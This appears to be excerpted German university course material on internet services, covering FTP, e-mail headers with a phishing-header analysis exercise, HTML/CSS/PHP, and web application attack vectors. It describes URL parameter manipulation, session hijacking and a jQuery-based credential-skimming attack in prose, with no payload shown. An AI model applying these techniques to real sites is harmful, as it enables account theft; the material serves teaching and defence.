Passives FTP Beim passiven FTP (auch „Passive Mode“) sendet der Client ein PASV- oder einEPSV-Kommando, der Server öffnet einen Port und übermittelt diesen mitsamtIP-Adresse an den Client. Hier wird auf der Client-Seite ein Port jenseits 1023

3.3 Datenaustausch Seite 81

verwendet und auf der Server-Seite der vorher an den Client übermittelte Port.Diese Technik wird eingesetzt, wenn der Server keine Verbindung zum Clientaufbauen kann. Dies ist bspw. der Fall, wenn der Client sich hinter einem Routerbefindet oder wenn eine Firewall das Netzwerk des Clients vor Zugriffen vonaußen abschirmt. Die nachfolgende Abbildung 3.2 zeigt das Schema einer FTP-Verbindung mit folgendem Ablauf:

1. Client öffnet über Port A eine Verbindung zum Port 21 (Command) desServer und teilt mit dem Befehl „PASV“ mit, dass eine passive Verbindunggeöffnet werden soll.

2. Der Server öffnet einen neuen Port (Port C) oberhalb 1024 und sendet alsAntwort ein „OK“ an den Data Port C.

3. Der Client öffnet über den Port B eine Verbindung zum neuen Data Port(Port C) des Servers.

4. Der Server bestätigt ebenfalls die Verbindung und sendet als Antwort ein„OK“.

FTP-ServerFTP-Client

Port BData

Port ACommand

Port 21Command

Port 20Data

„PASV“

„OK Port C“

„Data Channel“

„OK“

Port CData

Abb. 3.2: Passives FTP

Anonymous FTP

Einige FTP-Server, vor allem Server von Universitäten, Hochschulen und Mirrors,bieten sogenanntes Anonymous FTP an. Solche FTP-Server werden auch als öffent-liche FTP-Server oder als Pub (vom englischen public, dt.: öffentlich) bezeichnet.Hier ist zum Einloggen neben den realen Benutzerkonten ein spezielles Benutzer-konto, typischerweise „anonymous“ und/oder „ftp“, vorgesehen, für das kein(oder ein beliebiges) Passwort angegeben werden muss. Früher gehörte es zum„guten Ton“, bei Anonymous FTP seine eigene, gültige E-Mail-Adresse als Pass-

Seite 88 Studienbrief 3 Internetdienste

noch nicht verwendetes Zeichen aus dem Schriftsatz amerikanischer Fernschreiber(ASCII) war.

E Exkurs 3.2: @-Zeichen

Die genaue Herkunft des @-Zeichen ist bis heute noch nicht geklärt. Es wirdvermutet, dass das Zeichen bereits im Mittelalter verwendet worden ist undeine kaufmännische Bedeutung hatte. Die erste Überlieferung stammt ausdem Jahre 1555 von der Iberischen Halbinsel. Und bereits seit dem Jahre1880 ist es auf englischen Schreibmaschinen nachgewiesen wpa.

Domänenteil Für den Domänenteil gelten die gleichen Regeln wie für Domainnamen. Bei Do-mains mit Umlauten kann es zu Problemen kommen, da noch nicht alle Systemedie Kodierung unterstützen.

Groß- und Kleinschreibung]Groß- und Klein-schreibung & LängeOb im Lokalteil zwischen Groß- und Kleinschreibung unter-schieden wird, ist abhängig von der Interpretation durch das System des Empfän-gers. Es kanndurchaus Systeme geben, bei denen dieseUnterscheidung anzutreffenist. Allerdings führen viele Betreiber diese Unterscheidung nicht durch, da es sonstzu Verwirrungen führen könnte. Im RFC gibt es keine Längenbegrenzung fürE-Mail-Adressen. Das SMTP-Protokoll definiert allerdings eine maximale Längevon 64 Zeichen für den Lokalteil, und 255 für den Domänenteil. Allerdings ist diemaximale Länge bei der Verarbeitung zusätzlich beschränkt, woraus sich damiteine maximale Länge für die gesamte E-Mail-Adresse von 254 Zeichen ergibt.

Aufbau einer E-Mail

Header und Body E-Mails werden in zwei Teile unterteilt, einem Kopfbereich (Header) und einemInhaltsbereich (Body). Im Header stehen die Informationen für den Versand undim Body der Inhalt einer E-Mail.

Header (Kopfbereich) Der Header enthält als Pflichtangabe lediglich eine Absenderangabe und dasDatum der Erstellung der E-Mail. Darüber hinaus kann der Header einer E-Maileine Reihe optionaler Angaben enthalten. In der Regel finden sich Informationenüber den Weg, den die E-Mail genommen hat, über den Inhalt der Nachricht undderen Format sowie Angaben zu den Empfängern. Dabei enthält der Header keineInformationen, die für die Zustellung notwendig sind, da der Absender und derEmpfänger direkt von dem Versandserver an den Empfangsserver übergeben wird.Viele E-Mail Programme interessieren sich nicht oder nur selten für alle Header-Zeilen. Deshalb zeigen die meisten Programme standardmäßig nur einen kleinenTeil der tatsächlich in der E-Mail enthaltenen Header-Zeilen an. Der Quelltext 3.1zeigt, welche Einträge von einem Microsoft Exchange E-Mail-Server im Headervorgenommen werden. Die wichtigsten Einträge lauten wie folgt:

• From Absender

• To Empfänger

• CC weitere Empfänger

• BCC Blindkopie

• Subject Betreff

• Date Zeitpunkt der Erstellung

3.5 E-Mail Seite 89

Body (Inhaltsbereich)Der Body einer E-Mail ist durch eine Leerzeile vom Header getrennt und enthältdie zu übertragenden Informationen in einem oder mehreren Teilen. Eine E-Maildarf dabei nur Zeichen des 7-Bit-ASCII-Zeichensatzes enthalten. Sollen andereZeichen, wie zum Beispiel deutsche Umlaute, oder Daten, wie zum Beispiel Bilder,übertragen werden, müssen das Format im Header-Abschnitt deklariert und dieDaten passend kodiert werden. Aktuelle E-Mail-Programme kodieren Text undDateianhänge bei Bedarf automatisch. Der Quelltext 3.2 zeigt ein Gerüst einerleeren E-Mail, wie sie von Outlook 2013 erstellt wird.

HTML-E-MailsE-Mails können auch imHTML-Format verschickt werden, damit können Schriftenformatiert und Links eingefügt werden. Obwohl das HTML-Format standardi-siert ist, war es ursprünglich nicht für den Einsatz in E-Mails gedacht. Das führteunter anderem dazu, dass es in der Vergangenheit viele, auch konzeptuelle Sicher-heitslücken in der Darstellung von HTMl in den E-Mail-Programmen gab, diezur Verbreitung von E-Mail-Würmern beigetragen haben. Die oft inkonsistenteBehandlung von HTML-Features in verschiedenen E-Mail-Programmen hat auch

Seite 90 Studienbrief 3 Internetdienste

den Effekt, dass optische Effekte oder Formatierungen nicht so dargestellt werden,wie es vom Absender gedacht war.

QQuelltext 3.1: E-Mail-Header

1 Received: from izcexchange1.ad.fh-albsig.de (141.87.114.188) byizcexchange1.ad.fh-albsig.de (141.87.114.188) withMicrosoft SMTP Server (TLS) id 15.0.913.22 via MailboxTransport; Mon, 15 Dec 2014 15:09:45 +0100

2 Received: from izcexchange1.ad.fh-albsig.de (141.87.114.188) byizcexchange1.ad.fh-albsig.de (141.87.114.188) withMicrosoft SMTP Server (TLS) id 15.0.913.22; Mon, 15 Dec2014 15:09:44 +0100

3 Received: from izcexchange1.ad.fh-albsig.de ([141.87.116.11])by izcexchange1.ad.fh-albsig.de ([141.87.116.11]) with mapiid 15.00.0913.011; Mon, 15 Dec 2014 15:09:44 +0100

4 Content-Type: application/ms-tnef; name="winmail.dat"5 Content-Transfer-Encoding: binary6 From: "Scheible, Tobias" <scheible@hs-albsig.de>7 To: "Scheible, Tobias" <scheible@hs-albsig.de>8 Subject: Test9 Thread-Topic: Test

10 Thread-Index: AdAYcMRzfZL4rgvkTmKs2JnbQiVTPg==11 Date: Mon, 15 Dec 2014 15:09:44 +010012 Message-ID: <b03f00c8707b48dfb94b922194ad34c4@izcexchange1.ad.

fh-albsig.de>13 Accept-Language: de-DE, en-US14 Content-Language: de-DE15 X-MS-Has-Attach: yes16 X-MS-Exchange-Organization-SCL: -117 X-MS-TNEF-Correlator: <

b03f00c8707b48dfb94b922194ad34c4@izcexchange1.ad.fh-albsig.de>

18 MIME-Version: 1.019 X-MS-Exchange-Organization-MessageDirectionality: Originating20 X-MS-Exchange-Organization-AuthSource: izcexchange1.ad.fh-

albsig.de21 X-MS-Exchange-Organization-AuthAs: Internal22 X-MS-Exchange-Organization-AuthMechanism: 0423 X-Originating-IP: [141.87.114.150]24 X-MS-Exchange-Organization-Network-Message-Id: 8227f908-d1ce

-485a-b8b2-08d1e687e94d25 Return-Path: scheible@hs-albsig.de26 X-MS-Exchange-Organization-AVStamp-Mailbox: Sophos

;2072770050;0;PM

Seite 92 Studienbrief 3 Internetdienste

K Kontrollaufgabe 3.5: E-Mail-Header-Analysemit Auswertungsprogramm

Analysieren Sie den nachfolgenden E-Mail-Header mit einem Analyse-Tool,wie z. B. http://www.gaijin.at/olsmailheader.php.Welche Server sind im Übertragungsweg erkennbar?Welche Übertragungsabschnitte sind mit TLS Transport verschlüsselt?Welche Inkonsistenzen gibt es hinsichtlich des Absenders?

Received: from izcexchange1.ad.fh-albsig.de (141.87.114.188) byizcexchange1.ad.fh-albsig.de (141.87.114.188) with Microsoft SMTP Server(TLS) id 15.0.1130.7 via Mailbox Transport; Tue, 6 Oct 2015 04:09:53 +0200

Received: from izcexchange1.ad.fh-albsig.de (141.87.114.188) byizcexchange1.ad.fh-albsig.de (141.87.114.188) with Microsoft SMTP Server(TLS) id 15.0.1130.7; Tue, 6 Oct 2015 04:09:53 +0200

Received: from izcmx2.hs-albsig.de (141.87.109.16) byizcexchange1.ad.fh-albsig.de (141.87.114.188) with Microsoft SMTP Server(TLS) id 15.0.1130.7 via Frontend Transport; Tue, 6 Oct 2015 04:09:53 +0200

Received: from csr101.belwue.de (129.143.2.75) by izcmx2.hs-albsig.de(141.87.109.16) with Microsoft SMTP Server (TLS) id 15.0.1130.7; Tue, 6 Oct2015 04:09:52 +0200

Received: from goodgood.cloudservers.net.au (goodgood.cloudservers.net.au [103.9.64.100])by csr101.belwue.de with ESMTP id t9629g85026624for <rieger@hs-albsig.de>; Tue, 6 Oct 2015 04:09:50 +0200 (MEST)env-from (Service@Amazon.de)Received: from [104.40.201.41] (port=1123 helo=[100.112.76.170])by goodgood.cloudservers.net.au with esmtpa (Exim 4.85)(envelope-from <Service@Amazon.de>)id 1ZjH3p-00047x-KTfor rieger@hs-albsig.de; Tue, 06 Oct 2015 09:28:58 +0800Message-ID: <EO6W8P6C-HO8I-XTRD-YAN7-THFJZ8F5EHYC@Amazon.de>MIME-Version: 1.0From: <Service@Amazon.de>To: Martin Rieger <rieger@hs-albsig.de>Subject: Amazon KundencenterDate: Tue, 6 Oct 2015 01:28:57 +0000Content-Type: text/html; charset="iso-8859-1"Content-Transfer-Encoding: quoted-printableX-WatchGuard-Spam-ID: str=0001.0A090201.5612F72A.0080,ss=3,sh,re=0.000,recu=0.000,reip=0.000,cl=3,cld=1,fgs=0X-WatchGuard-Spam-Score: 3, bulk; 0, virus threat unknownX-WatchGuard-Mail-Client-IP: 104.40.201.41X-WatchGuard-Mail-From: Service@Amazon.deX-WatchGuard-Mail-Recipients: rieger@hs-albsig.deX-WatchGuard-AntiVirus: part scanned. clean action=allowX-AntiAbuse: This header was added to track abuse, please include it with any abuse reportX-AntiAbuse: Primary Hostname - goodgood.cloudservers.net.auX-AntiAbuse: Original Domain - hs-albsig.deX-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]X-AntiAbuse: Sender Address Domain - Amazon.deX-Get-Message-Sender-Via: goodgood.cloudservers.net.au: authenticated_id: test@ifireshop.com.auX-Source:X-Source-Args:X-Source-Dir:X-WatchGuard-AntiVirus: part scanned. clean action=allowX-DCC-BelWue-Metrics: csr101.belwue.de 1243; bulk Body=1 Fuz1=1 Fuz2=manyReturn-Path: Service@Amazon.deX-MS-Exchange-Organization-PRD: Amazon.deX-MS-Exchange-Organization-SenderIdResult: FailReceived-SPF: Fail (izcmx2.hs-albsig.de: domain of Service@Amazon.de does notdesignate 129.143.2.75 as permitted sender) receiver=izcmx2.hs-albsig.de;client-ip=129.143.2.75; helo=csr101.belwue.de;

X-MS-Exchange-Organization-Network-Message-Id: f81a768a-7544-45be-310f-08d2cdf338c4X-MS-Exchange-Organization-AVStamp-Mailbox: Sophos;-1760401150;0;PMX-MS-Exchange-Organization-AuthSource: izcmx2.hs-albsig.deX-MS-Exchange-Organization-AuthAs: Anonymous

E-Mail-Clients

Programme Für viele Betriebssysteme existieren verschiedene E-Mail-Programme, um E-Mailszu empfangen, zu verwalten und zu senden. Sie unterscheiden sich dabei in ih-rem Funktionsumfang und Bedienungskonzept. Bekannte E-Mail-Programme fürWindows sind Outlook von Microsoft und Thunderbird von Mozilla.

Webmail Als Webmail werden Dienste im World Wide Web bezeichnet, welche die Verwal-tung von E-Mails mit einemWebbrowser ermöglichen. Standardmäßig sind einAdressbuch und Dateiverzeichnis integriert. Viele Internetserviceprovider bietenWebmail als Ergänzung zu ihrem Service an. Vorteilhaft sind die geringen Anforde-rungen, da E-Mails von jedem Computer mit Internetanbindung und Webbrowserverfügbar sind. Zudem ist der letzte Stand der Bearbeitung des Postfachs (z. B.gelesene, verschobene, gelöschte E-Mails, Adressbuch) überall der gleiche, egal obman von zu Hause, im Büro oder im Urlaub auf seine E-Mail zugreift. Nachteiligist, dass die Weboberflächen im Vergleich zu gängigen E-Mail-Clients teils wenigerFunktionen beherrschen. Insbesondere bei der mobilen Bearbeitung von Mails

Studienbrief 4 World Wide Web Seite 109

Studienbrief 4 World Wide Web

4.1 Lernergebnisse

Im Studienbrief „World Wide Web“ lernen Sie das Zusammenspiel der verschie-denen Techniken von Websites kennen, um diese einordnen zu können. Dadurchkönnen Sie Websites analysieren und erkennen, welche Technologien potenziellfür einen Angriff anfällig sind.

4.2 Advance Organizer

Für den Studienbrief „World Wide Web“ sind praktische Erfahrungen im Umgangmit dem Internet empfehlenswert. Dazu gehört die Verwendung von gängigenWebbrowsern. Des Weiteren sind Kenntnisse über HTML und JavaScript empfeh-lenswert. ZumModul Internettechnologien werden die Mikromodule "Program-mieren in HTML 5 und CSSünd "Programmieren in JavaScriptängeboten.

4.3 Technik

KommunikationDie wesentliche Kommunikation im World Wide Web findet zwischen dem Web-browser (siehe Abschnitt 4.5 auf Seite 127) und demWebserver (siehe Abschnitt4.6 auf Seite 129) statt. Um eine Website aufzurufen, schickt der Webbrowser eineAnfrage an den Webserver; als Antwort sendet er die notwendigen Dateien an denWebbrowser. Die Kommunikation dafür findet primär über das HTTP-Protokollstatt. Die nachfolgende Grafik (Abb. 4.1) zeigt schematisch die World-Wide-Web-Komponenten. Die einzelnen Komponenten werden in den nachfolgenden Ab-schnitten behandelt.

Abb. 4.1: Word-Wide-Web-Komponenten

Ubertragung@Übertragung]ÜbertragungZum Anzeigen einer Webseite werdendie entsprechend eingebundenen Inhalte einzeln vom Server zum Client übertra-gen. Das bedeutet, während des Aufbaus einer Webseite wird für jede benötigteDatei (z. B. Bilddateien, . . . ) eine Anfrage vom Client an den Server gesendet. DerWebserver antwortet und startet die Übertragung der angeforderten Datei. Fürdie Darstellung einer komplexen Webseite sind somit mehrere 100 Anfragen undAntworten des Servers notwendig.

4.3.1 Hypertext Transfer Protocol

HTTPDas Hypertext Transfer Protocol (HTTP) ist ein Protokoll zur Übertragung vonDaten über ein Netzwerk. Es wird hauptsächlich eingesetzt, umWebseiten aus demWorld Wide Web (WWW) in einen Webbrowser zu laden. Die Kommunikationzwischen einem Client und dem Server erfolgt über die zwei unterschiedlichen

Seite 122 Studienbrief 4 World Wide Web

B Beispiel 4.5: Formular-Sicherheit

Die Eingabe von Inhalten über Formulare ist eine Funktion, die schon langezur Verfügung steht und damit zu den Kernelementen zählt. Allerdingswerden darüber Daten zum Server gesendet, was somit einer Schnittellegleich kommt. Und damit existiert eine grundsätzliche Methode, womitein Angreifer komprimierte Daten an einen Server senden kann. Denn alsgrundsätzliche Regel gilt: Es sollte nie der Eingabe eines Benutzers vertrautwerden. Jede Eingabe muss gefiltert werden. Den auch wenn ein Formularnur bestimmte Eingabe ermöglicht, kann es manipuliert werden und sobösartige Inhalte versenden.

E Exkurs 4.3: Weitere HTML-Elemente

Da die Vorstellung aller HTML-Elemente den Rahmen diese Studienbriefsdeutlich sprengen würde, wurden hier nur exemplarisch einige wichtigeElemente vorgestellt. Eine gute Übersicht über weitere HTML-Elemente fin-den Sie auf Selfhtml http://de.selfhtml.org/html/. Dies ist eine Internet-Dokumentation, die sich mit den verschiedenen Aspekten der Erstellungvon Webseiten befasst.ZumModul Internettechnologien wird ein Mikromodul "Programmierenin HTML 5 und CSSängeboten.

K Kontrollaufgabe 4.5: HTML-Seite mit Formular

Fügen Sie Quelltext 4.5 in Quelltext 4.1 ein.Formatieren und beschriften Sie die Eingabefelder. Dazu können Sie z. B.Zeilenumbrüche oder Tabellen verwenden.Erproben Sie die neue Seite "my_form.html" im Browser.

4.4.2 Cascading Style Sheets

CSS In den Anfangszeiten des World Wide Webs wurden Eigenschaften zur Gestal-tung direkt per Attribut eines Elements festgelegt. Mittlerweile wird eine Tren-nung des Inhalts und der Gestaltung angestrebt, weshalb viele normale HTML-Formatierungen heute als deprecated (engl.: abgelehnt) gelten. Stattdessenwird dieFormatierungssprache Cascading Style Sheets (CSS) verwendet. Stylesheets dienender sauberen Trennung von Layout und den eigentlichen Inhalten einer HTML-Seite. Die gewünschten Formatierungen können sogar in externen CSS-Dateienabgelegt und in mehreren HTML-Dokumenten wieder eingebunden werden. Dieeinmalig festgelegte Gestaltung gilt dann für die entsprechendenWebsites. Das hatden Vorteil, dass der Quelltext übersichtlicher ist. Außerdem lassen sich mit Style-sheets HTML-Elemente detaillierter definieren als mit den veralteten Möglichkei-ten von HTML. Die Formatierungen lassen sich entweder in der Datei selbst oderin einer separaten CSS-Datei definieren. Eine Kombination von beidem ist auchmöglich, um z. B. ein allgemeines Design zu übernehmen und es mit seitenspe-zifischen Formatierungen zu verfeinern. Der Quellcode 4.6 zeigt drei Methoden,

4.4 Website Seite 123

wie CSS-Deklarationen definiert werden können. Quellcode 4.7 zeigt ein einfachesBeispiel, wodurch alle Links rot gefärbt werden.

QQuelltext 4.6: CSS in HTML einbinden

1 <!DOCTYPE HTML>2 <html>3 <head>4 <title>Open C3S</title>5 <!-- externe CSS-Datei wird eingebunden -->6 <link rel="stylesheet" type="text/css" href="formate.css">7 <!-- zentrale CSS-Deklarationen innerhalb einer HTML-Datei

-->8 <style type="text/css">9 /* CSS-Deklarationen */

10 </style>11 </head>12 <body>13 <!-- einzelne CSS-Deklaration -->14 <h1 style="color: red;">Headline</h1>15 </body>16 </html>

QQuelltext 4.7: CSS-Beispiel

1 a{2 color: red;3 }

BBeispiel 4.6: CSS-Sicherheit

In der ersten Version von CSSwar es nurmöglich, das Aussehen von Elemen-ten zu verändern. Mit den fortschreitenden Versionen kamen immer neueFunktionen hinzu. Zum Beispiel gibt es die Möglichkeit, über den Befehlopacity ein Element transparent zu machen. Dies wurde ausgenutzt, umeinen Link, der zu 1% sichtbar ist, also so gut wie nicht mehr wahrnehmbarist, über einem anderen Link zu positionieren, auf den ein Benutzer klickenkann. Dies wurde von den Webbrowserherstellern gelöst, indem Elementeunter einer bestimmten Schwelle nicht mehr auswählbar sind. Ein anderesBeispiel ist das Hinzufügen von Inhalten über den Befehl content. Damitkönnen Inhalte auf einer Seite erscheinen, die per CSS eingebunden werdenund nicht im HTML-Code auftauchen. Durch diese Fähigkeiten von CSSist es wichtig, darauf zu achten, dass ein Angreifer keine Möglichkeitenhat, einen eigenen CSS-Code einzuschleusen. Daher muss jede Eingabe vonBenutzern auch auf CSS-Code untersucht werden.

Seite 132 Studienbrief 4 World Wide Web

einer .aspx-Datei in der Form <% – dynamic code – %> hinterlegt. Diese Art derEinbettung ähnelt stark den Konstrukten anderer Web-Programmiersprachen wiePHP, JSP und ASP. Allerdings forciert Microsoft mit verschiedenen Ansätzen einestärkere Trennung.

ASP.NET-Beispiel Das nachfolgende Beispiel im Quelltext 4.12 zeigt, wie ASP.NET in einer HTML-Datei integriert sein kann. Dabei führt ASP.NET nur den Teil innerhalb von <%und%> aus.

QQuelltext 4.12: ASP.NET-Beispiel

1 <!DOCTYPE HTML>2 <html>3 <head>4 <title>Open C3S</title>5 </head>6 <body>7 <\%8 Response.Write "ASP.NET Ausgabe"9 \%>

10 </body>11 </html>

PHP: Hypertext Preprocessor

PHP PHP:Hypertext Preprocessor (PHP) ist eine Skriptsprachemit einer an die Program-miersprachen C und Perl angelehnten Syntax, die hauptsächlich zur Erstellungdynamischer Webseiten oder Webanwendungen verwendet wird. PHP zeichnetsich durch die breite Datenbankunterstützung und Internetprotokolleinbindungaus. PHP wird auf ca. 77,8 % aller Websites als serverseitige Programmierspracheeingesetzt und ist damit die am häufigsten verwendete Sprache zum Erstellen vonWebsites, Tendenz steigend. Zudem ist sie bei den meisten Webhostern vorinstal-liert. PHP wird als freie Software unter der PHP-Lizenz verbreitet.

Funktionsweise PHP-Dateien werden bei einem Aufruf durch einen Webbrowser erst serverseitigverarbeitet, und dann ausgeliefert. Dadurch können dynamische Inhalte, wie zumBeispiel Daten aus einer Datenbank, in eine HTML-Seite eingefügt werden. Umeine PHP-Datei ausführen zu können, benötigt man einen Webserver, der die PHP-Anweisungen interpretieren kann. Die Kombination von Linux/Windows/OSX als Betriebssystem, Apache als Webserver, MySQL als Datenbanksystem undPHP wird LAMP (für Linux), WAMP (für Windows) oder MAMP (für OS X)genannt. Fertige LAMP-, MAMP- und WAMP-Pakete, die das einzelne Laden undKonfigurieren von Paketen aus dem Internet unnötig machen, werden etwa imProjekt XAMPP entwickelt. Hier gibt es Versionen für Linux, Solaris, Windowsund Mac OS X.

PHP-Beispiel Das nachfolgende Beispiel in Quelltext 4.13 zeigt, wie PHP in einer HTML-Datei

Studienbrief 5 Web Applications Security Seite 143

Studienbrief 5 Web Applications Security

5.1 Lernergebnisse

Im Studienbrief „Web Applications Security“ lernen Sie den Aufbau der Architek-tur dieser Anwendungen kennen, und welche Aspekte besonders für die Sicherheitrelevant sind. Anschließend werden konkrete Angriffsvektoren betrachtet, die miteiner Demo-Plattform konkret nachvollzogen werden können.

5.2 Advance Organizer

Für den Studienbrief „Web Applications Security“ sind praktische Erfahrungen imUmgang mit demWorldWideWeb empfehlenswert. DesWeiteren sind Kenntnisseüber die Struktur von Websites von Vorteil. Dieser Studienbrief baut auf demvorherigen Studienbrief „World Wide Web“ auf.

5.3 Webbasierte Anwendungen

Anwendungen imWebbrowser

Mit webbasierten Anwendungen werden Programme beschrieben, die dem An-schein nach im Fenster des Webbrowsers ablaufen. Allerdings wird die eigentlicheProgrammlogik von einem Webserver bereitgestellt. Der Webbrowser stellt nurdie Schnittstelle zwischen einem Benutzer und der Anwendung dar. Eine ent-sprechende Anwendung (z. B. PHP, SQL, Java, etc.) generiert als Antwort denentsprechenden HTML-Quellcode und sendet diesen zurück an den Webbrowser.Prinzipiell gesehen ist die Webseite somit die grafische Benutzeroberfläche derWebanwendung auf dem Server. Viele klassische Anwendungen können als webba-sierte Anwendungen realisiert werden. Der aktuelle Trend zur Dezentralisierungbzw. Auslagerung von Anwendungen und Daten ist sehr ausgeprägt. Dadurchgeraten Webanwendungen immer häufiger in den Fokus von Hackern.

BBeispiel 5.1: Webmail

Webmailer gehören mitunter zu den schon am längsten bestehenden undam weitesten verbreiteten Web Applications. Durch die große Verbreitungdes E-Mail-Dienstes bestand schon früh die Bestrebung, E-Mails auch überdenWebbrowser abzurufen. Mittlerweile sindWebmailer so verbreitet, dasseinige Benutzer gar keine traditionelle Desktop-Clients mehr verwenden,bzw. diese gar nicht kennen.

5.3.1 Funktionsweise

lokal installierte An-wendungen

Mit dem Erwerb einer Anwendung, die für die lokale Installation auf dem Rechnergedacht ist, wird nur eine Lizenz zurNutzung der Anwendung erworben und nichtdie Anwendung selbst. Die Anwendung wird von einem Anbieter bereitgestellt.Der Benutzer einer Anwendung kann diese lokal auf einen dafür vorgesehenenRechner unter Beachtung der Nutzungslizenz installieren. Der Käufer muss dieInstallation und eventuell notwendige Aktualisierungen der Anwendung selbstvornehmen. Dabei muss er auch den Rechner bereitstellen, auf dem die Anwen-dung lokal laufen soll.

WebanwendungenEine Webanwendung hingegen wird auf einemWebserver betrieben. Der Zugriffauf die Webanwendung und die Interaktion mit ihr erfolgen über einen Webbrow-ser. Durch den Zugriff über das Web spielt es für den Benutzer keine Rolle, wosich der Webserver mit der Webanwendung befindet. Außerdem ist es unwichtig

Seite 154 Studienbrief 5 Web Applications Security

K Kontrollaufgabe 5.10: Angreifer und Angriffsart

Ein Unternehmen sei folgenden IT-Angriffen ausgesetzt

a Trojaner-Malware

b IP-Spoofing bei Server-Anfrage

c Sniffen von IP-Netzwerkverkehr (z. B. Mail)

d Software-Keylogger

Erläutern Sie für jeden obengenannten Angreifer die Art welche verwendetwird.

5.4.2 Angriffe auf Client-Ebene

Auf der Client-Ebene wird versucht, Schwachstellen im Code auszunutzen, damitder Webbrowser des Opfers eine nicht vorgesehene Aktion ausführt.

Quelltext-Analyse

Struktur Bei der Untersuchung einer Web Application ist der erste Schritt die Analyse desQuelltextes, also der vom Server ausgelieferter HTML-Code und aller dazugehöri-ger zusätzlicher Dateien (z. B. JavaScript, CSS, Grafiken, ...). Der Quelltext einerWebsite kann zum Beispiel in einemWebbrowser angezeigt werden. Interessantsind hierbei alle Elemente, über die ein Benutzer mit einemWebserver kommu-nizieren kann. Dazu gehören zum Beispiel Formulare, die an dem <form>-Tagerkennbar sind. Formulare können aber auch mit JavaScript ausgelesen werdenund müssen daher nicht immer einen <form>-Tag besitzen. Stattdessen müssendie einzelnen <input>-Felder analysiert werden. Hier sollte dann im JavaScript-Code nach den IDs der <input >-Felder und die weitere Verarbeitung untersuchtwerden.

Verschleierung Wenn sensible Inhalte im Quelltext vorhanden sind, werden häufig Methodenzur Verschleierung eingesetzt. Zum Teil werden Variablen durch nichtssagendenBezeichner ersetzt (z. B. aus benutzernamen wird a) und alle Umbrüche und unnöti-gen Leerzeichen werden gelöscht. Dies soll das Lesen des Quelltextes unmöglichmachen. Zum Teil kann dies aber mit Tools rückgängig gemacht werden und mitdem entsprechendem Zeitaufwand kann jeder Quelltext wieder lesbar gemachtwerden. Andere Methoden, die Inhalte zu verschleiern, sind die Verwendungvon anderen Kodierungen wie base64 oder die Verwendung von hexadezimalenZahlen anstatt von dezimal Zahlen.

Werkzeuge Für die Analyse des generierten Quelltextes von Websites stehen diverse Tools zurVerfügung. Ein vielseitiges Tool zur Untersuchung ist das Webbrowser Add-OnFirebug1 in Firefox. Nach der Installation wird ein neuer Eintrag im Kontextmenühinzugefügt. Klicken Sie einfach mit der rechten Maustaste auf ein Element, wel-ches Sie untersuchen möchten und wählen Sie die Option „Element mit Firebuguntersuchen“ aus. Danachwird die entsprechende Stelle des Quelltextes in Firebugangezeigt, die Abbildung 5.3 zeigt dies. Mit Firebug können auch übersichtlichalle Requests analysiert werden und zum Beispiel nach bestimmten Typen gefiltertwerden oder weitere Details eingesehen werden. Abbildung 5.4 zeigt zum Beispieldie übermittelten Daten per POST.

1 http://getfirebug.com

5.4 Angriffsvektoren Seite 155

Abb. 5.3: Analyse desQuelltextes in Firebug

Abb. 5.4: Analyse derübertragenen Daten inFirebug

KKontrollaufgabe 5.11: Quelltext-Analyse

Wie können Inhalte im Quelltext versteckt werden?

URL-Manipulation

ParametermanipulationDa über die URL Parameter per GET übergeben werden können, erfolgt somiteine Eingabe gegenüber dem Server. Da diese Daten sehr einfach geändert werdenkönnen, wird dies sehr häufig für Angriffe ausgenutzt. Im einfachsten Fall kanneine ID in einer URL geändert werden, um eine Seite anzuzeigen die normalerweisenicht direkt aufrufbar ist. Das nachfolgende Beispiel zeigt, wie ein Artikel mit derID 2 aufgerufen werden kann:

Original: http://example.com/article.php?id=1Manipuliert: http://example.com/article.php?id=2

Darüber hinaus kann bei solch einem Angriff versucht werden, den Benutzerna-men zu wechseln oder in ein Verzeichnis zu gelangen, auf welches normalerweisenur der Administrator Zugriff hat. Viele unerfahrene Webentwickler verfallender Wunschvorstellung, dass Seiten, die nirgends verlinkt sind, auch von nieman-dem aufgerufen wird. Das dies aber sehr häufig ein Trugschluss ist, haben dievielen Vorfälle in der Vergangenheit gezeigt. Denn alleine durch das Ausprobie-ren von typischen „Begriffen“ wie admin, user, config oder edit kann man solche„unbekannten Zugänge“ erraten.

5.4 Angriffsvektoren Seite 161

Abb. 5.9: Screenshot desReiter „Cookie“ in Firebug

Schutzmechanismen

CookieUm Session-Hijacking zu verhindern, sollte immer eine HTTPS-Verbindung ge-nutzt werden, damit der Datenverkehr nicht im Klartext abgefangen werden kann.Zusätzlich sollte die Cookie-Einstellung auf secure gesetzt werden, damit werdenCookies ausschließlich über HTTPS-Verbindungen übertragen. Des Weiteren sollteebenfalls auf das Attribut HttpOnly gesetzt gesetzt werden, damit nicht per Ja-vaScript auf das Cookie zugegriffen werden kann. Eine andere Methode ist dasSpeichern von zusätzlichen Informationen, die bei jedem Aufruf überprüft werdenkönnen. Dazu gehört zum Beispiel die IP-Adresse oder der User-Agent-Header-Eintrag.

KKontrollaufgabe 5.15: Session Hijacking

Wie kann auf ein Cookie zugegriffen werden?

Cross-Site-Authentication-Attacke

AnmeldeinformationenBei der Cross-Site-Authentication-Attacke handelt es sich um eine Methode, umAnmeldeinformationen mit Schadcode auszuspionieren. Dazu wird entwederdem Besucher ein Login vorgegaukelt, welches ihn verleiten soll, das korrektePasswort einzugeben oder ein vorhandener Login wird per JavaScript ausgelesen.Diese Angriffsart baut auf der Cross-Site-Scripting-Methode auf, da hier Codeeingeschleust wird, um einen Login auszuspähen.

BeispielAngreifer nutzen häufig bereits vorhandene JavaScript-Bibliotheken aus, umCross-Site-Authentication-Attacken durchzuführen. jQuery3 ist die am häufigsten ver-wendete Bibliothek und daher für Angreifer besonders interessant. Das folgendeBeispiel zeigt einen Beispielcode, der das Stichwort eines Suchfeldes per Ajax aneinen Server schickt. Der erste Quelltext 5.1 zeigt ein Eingabefeld und einen Button.Beide besitzen eine eindeutige ID, über die sie angesprochen werden können. Derzweite Quelltext 5.2 zeigt den Schadcode, der die Funktionen von jQuery nutzt.Die erste Zeile mit der Methode mousedown sorgt dafür, dass die nachfolgendenBefehle ausgeführt werden, sobald die Maustaste betätigt wird. Hier muss eineMethode verwendet werden, die möglichst früh ausgeführt wird, damit der Befehlnoch vor dem eigentlichen Absenden des Formulars ausgeführt wird. Die nächs-te Zeile liest den Inhalt des Eingabefeldes aus und speichert ihn in der Variableq. In der darauffolgenden Zeile steht der Befehl, der die Daten per Ajax an denServer schickt. In diesem Fall werden die Daten per POST-Methode an die URL

3 http://query.com

